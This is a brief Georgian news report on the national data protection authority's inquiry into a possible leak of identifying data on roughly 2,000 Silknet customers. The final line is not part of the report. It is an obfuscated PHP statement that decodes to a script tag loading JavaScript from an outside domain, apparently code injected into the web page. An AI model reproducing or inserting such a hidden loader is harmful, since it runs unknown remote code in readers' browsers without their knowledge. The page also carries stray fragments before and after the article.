celsiusi
ავერსი საქკაბელი

 პერსონალურ მონაცემთა დაცვის სამსახურში აცხადებენ, რომ კომპანია „სილქნეტის“ მომხმარებელთა მაიდენტიფიცირებელი მონაცემების უნებართვო გამჟღავნების შესაძლო ფაქტზე შესწავლა მიმდინარეობს.

პერსონალურ მონაცემთა დაცვის სამსახურის ინფორმაციით, აღნიშნული ფაქტის შესახებ პერსონალურ სამსახურს აცნობა ფიზიკურმა პირმა და დაწყებულია შესწავლა.

„საკითხის შესწავლა მიმდინარეობს მონაცემთა უსაფრთხოების ზომების დაცვასთან დაკავშირებით და ასევე, პერსონალურ მონაცემთა დაცვის სამსახურისთვის ინციდენტის შეტყობინების ვალდებულების შესრულებასთან დაკავშირებით“, – აცხადებენ პერსონალურ მონაცემთა დაცვის სამსახურში.

ცნობისთვის, კომპანია „სილქნეტში“ აცხადებენ, რომ მომხმარებელთა მცირე ჯგუფის, სავარაუდოდ 2 000-მდე პირის მაიდენტიფიცირებელი მონაცემების უნებართვო წვდომისა და გამჟღავნების შესაძლო ფაქტთან დაკავშირებით, კომპიუტერულ ინციდენტზე რეაგირების ღონისძიებები მიმდინარეობს.

213
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");